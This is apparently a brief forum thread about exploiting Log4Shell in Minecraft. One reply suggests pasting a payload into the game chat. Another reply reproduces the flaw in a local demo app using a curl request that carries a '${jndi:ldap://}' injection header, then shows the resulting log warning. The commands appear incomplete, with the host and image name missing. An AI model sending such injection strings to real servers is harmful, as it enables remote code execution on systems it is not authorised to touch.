How to exploit log4j in Minecraft?

How to exploit log4j in Minecraft? …

1 Like

its not vulnerable anymore

if you still wants to try then you can paste payload in chat box

If you want to reproduce this vulnerability locally, you can refer to christophetd’s vulnerable app. In a terminal run:

docker run -p 8080:8080

and in another:

curl -H 'X-Api-Version: ${jndi:ldap://}'

the logs should include an error message indicating that a remote lookup was attempted but failed:

2021-12-10 17:14:56,207 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://]. javax.naming.CommunicationException: [Root exception is Connection refused (Connection refused)]

1 Like